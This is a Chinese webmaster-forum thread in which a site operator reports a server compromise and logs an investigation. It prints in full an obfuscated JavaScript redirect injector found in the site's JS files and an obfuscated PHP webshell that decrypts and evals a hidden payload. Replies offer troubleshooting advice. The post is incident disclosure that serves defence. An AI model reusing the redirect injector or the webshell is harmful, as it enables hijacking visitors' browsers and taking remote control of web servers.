·设为首页收藏本站📧邮箱修改🎁免费下载专区📒收藏夹👽聊天室
12下一页
返回列表 发布新帖

网站被人植入木马,偷偷24小时跳转一次到黑产。

94 19
发表于 6 小时前 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
网站被人偷偷植入了下面的木马,偷偷24小时跳转一次到黑产。
目前不太确定漏洞在哪里,文末公布排查记录。
  1. (function(){    var _0xa1b2 = "aHR0cHM6Ly9hdi5ydW4="; //     var _0xc3d4 = "cmVkaXJlY3RlZA=="; //     var _0xd5e6 = "MjQ="; // 24小时    function _0xf7g8(_0x9h0i){ return atob(_0x9h0i); } //     function _0xj1k2(_0xl3m, _0xn4o){         var _0xp5q = new Date();         _0xp5q.setTime(_0xp5q.getTime() + (_0xn4o * 60 * 60 * 1000));         document.cookie = _0xl3m + "=1;expires=" + _0xp5q.toUTCString() + ";path=/";    }    function _0xr6s(_0xt7u){         var _0xv8w = document.cookie.match(new RegExp("(^| )" + _0xt7u + "=([^;]+)"));        return _0xv8w ? _0xv8w[2] : null;    }    window.addEventListener("load", function() {        var _0xurl = _0xf7g8(_0xa1b2);        var _0xcookie = _0xf7g8(_0xc3d4);        var _0xexpire = parseInt(_0xf7g8(_0xd5e6));                if (!_0xr6s(_0xcookie)) {            _0xj1k2(_0xcookie, _0xexpire);            eval("window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66'] = _0xurl;");        }    });})();
复制代码
网站被人植入木马,偷偷24小时跳转一次到黑产。 网页源码被篡改时间大概是这个。
===================================


最新排查记录:

2025.5.23 9:00  发现不止一个网站被植入,同一个服务器的多个网站被植入相同的代码,有没有可能是宝塔的漏洞或者是系统的漏洞?没有开通宝塔企业版,很多查杀功能用不了。

2025.5.23 10:00  宝塔面板里设置了open_basedir防止跨站攻击。这样说,webshell如果只修改了一个站,不可能所有站都能修改吧。

2025.5.23 10:20  发现这个ssh被攻击80多万次。如图:
网站被人植入木马,偷偷24小时跳转一次到黑产。

2025.5.23 11:20  发现第一个木马。dh.xxxxxx.cn\files\upload/img_678dba4d31bb1.php  网站程序是采用六零导航页,文件植入时间2025.1.20 10:51。
  1. Hello Administrator!WelCome To Tas9er PHP Console!<?php@error_reporting(0);session_start();    $govIZJXkkPZ= base64_decode(base64_decode("TVRaaFkyRmpZekExWVdGbVlXWTI=")).chr(55);    $_SESSION['k']=$govIZJXkkPZ;    session_write_close();    $govPQ=base64_decode(base64_decode("YjJKMWFHRnZjbkJtTlhWM05EUmtkbTl4"));    $govi7i1l1kf='openssl';    $gov8G=govQJI($govPQ);    $gov7TSqOX2B5AkEwxD="file_g".chr(101)."t_"."con".base64_decode("dGVudHM=");    $govaVW=$gov7TSqOX2B5AkEwxD($gov8G);    if(!extension_loaded($govi7i1l1kf))    {        $govc="base64_"."decode";        $govaVW=$govc("/*X]-DP@i*/".$govaVW);        for($i=0;$i<strlen($govaVW);$i++) {                             }    }    $govaVW=openssl_decrypt($govaVW, base64_decode(base64_decode("UVVWVE1UST0=")).chr(56), $govIZJXkkPZ);    $govH7fm2l8=explode('|',$govaVW);    $govVai9X1uHnV9=$govH7fm2l8[1];    class govEFO{public function __invoke($p) {eval("/*X]-DP@i*/".$p."");}}    @call_user_func(new govEFO(),$govVai9X1uHnV9);    function govQJI($gov84T8xX){    $di15 = '';    $govlHpFcRK = (6434+30541)*intval(chr(48));    $gov0m2hSQpX = (1258-1818)*intval(chr(48));    for ($i = 0, $j = strlen($gov84T8xX); $i < $j; $i++){        $govlHpFcRK <<= 5;        if ($gov84T8xX[$i] >= 'a' && $gov84T8xX[$i] <= 'z'){            $govlHpFcRK += (ord($gov84T8xX[$i]) - 97);        } elseif ($gov84T8xX[$i] >= '2' && $gov84T8xX[$i] <= '7') {            $govlHpFcRK += (24 + $gov84T8xX[$i]);        } else {            exit(1);        }        $gov0m2hSQpX += 5;        while ($gov0m2hSQpX >= 8){            $gov0m2hSQpX -= 8;            $di15 .= chr($govlHpFcRK >> $gov0m2hSQpX);            $govlHpFcRK &= ((1 << $gov0m2hSQpX) - 1);}}    return $di15;}?>
复制代码
网站被人植入木马,偷偷24小时跳转一次到黑产。
我要说一句 收起回复

评论19

TyCodingLv.8 发表于 6 小时前 | 查看全部
用的是什么系统?这点很重要,希望告知一下。
我要说一句 收起回复
独家记忆Lv.8 发表于 6 小时前 | 查看全部
很多系统、很杂,不止一个。好几个是网上几十块买的。所以排查起来比较难。
我要说一句 收起回复
拾光Lv.8 发表于 6 小时前 | 查看全部
我有个站  电脑端不跳,然后手机端第一次打开会跳,短时间就不跳了~   然后隔段时间又打开就会跳
我要说一句 收起回复
独家记忆Lv.8 发表于 6 小时前 | 查看全部
淘宝找人排查一下
我要说一句 收起回复
婷姐Lv.8 发表于 6 小时前 | 查看全部
本帖最后由 大佬 于 2025-2-23 09:40 编辑

我已经自己排查了,Linux下多个网站的JS被植入上面的代码。最早被植入的时间段从2月17日开始,2月19日也有修改。同一个服务器的多个网站被植入,有没有可能是宝塔的漏洞或者是系统的漏洞?
我要说一句 收起回复
TyCodingLv.8 发表于 6 小时前 | 查看全部
查系统日志
我要说一句 收起回复
CrystαlLv.8 发表于 6 小时前 | 查看全部
要找高人排查一下
我要说一句 收起回复
TyCodingLv.8 发表于 6 小时前 | 查看全部
里面跳转的站质量可以的,速度快,高清画质
我要说一句 收起回复
婷姐Lv.8 发表于 6 小时前 | 查看全部
可恶可恶
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.17.162.216,GMT+8, 2025-2-23 19:54 , Processed in 0.229033 second(s), 121 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2025 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表